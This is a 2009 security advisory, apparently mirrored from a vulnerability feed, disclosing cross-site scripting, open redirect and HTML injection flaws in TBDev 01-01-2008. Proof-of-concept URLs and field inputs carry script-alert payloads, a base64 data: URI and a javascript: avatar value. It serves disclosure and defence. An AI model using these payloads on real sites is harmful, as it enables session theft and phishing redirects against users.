Security Advisory: [InterN0T] TBDev 01-01-2008 - Multiple Vulnerabilities

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09
  SugarCRM 5.2.0e Remote Code Execution
  CakeCMS XSRF Vulnerability
  [InterN0T] Pivot 1.40.4-7 - Multiple Vulnerabilities

From: security_(at)_intern0t.net <security_(at)_intern0t.net>
Date: 16.06.2009
Subject: [InterN0T] TBDev 01-01-2008 - Multiple Vulnerabilities

TBDev - Cross Site Scripting and HTML Injection Vulnerabilities

Version Affected: 01-01-2008 (16th January 2008) (newest)

Info: TBDEV.NET is a project to further enhance, update and develop a software (php peer-to-peer)
from the original torrentbits/bytemonsoon source code.

Credits: InterN0T

External Links:
http://www.tbdev.net

-:: The Advisory ::-

Vulnerable Function / ID Calls:
returnto

Cross Site Scripting: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/makepoll.
php?returnto=><script>alert(0)</script>
http://[HOST]/tbdev/tbdev-01-01-08/polls.
php?action=delete&pollid=1&returnto=><script>alert(0)<
/script><br

Cross Site Script Redirection: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/news.
php?action=delete&newsid=1&returnto=data:text/html;base64,
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&sure=1

Cross Site Script Redirection: (Anyone, the enduser will need to log in though)
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST]
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

HTML Injection:
1) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Info field: </textarea><script>alert(0)</script> << is reflected locally only!

2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Avatar field: javascript:alert(0)

2b) Affected Sites by HTML Injection:
http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID

Internet Explorer 6 and perhaps 7 should be triggered by this.
Please see: http://ha.ckers.org/xss.html for more information.
Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other vulnerabilities)

-:: Solution ::-
Secure redirection calls with referer headers (just an example) and filter bad characters.

Conclusion:
This system was fun to find bad code in, it sure had a nice diversity of vulnerabilities.

Reference:
http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-mult
iple-vulnerabilities.html

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.

All of the best,
MaXe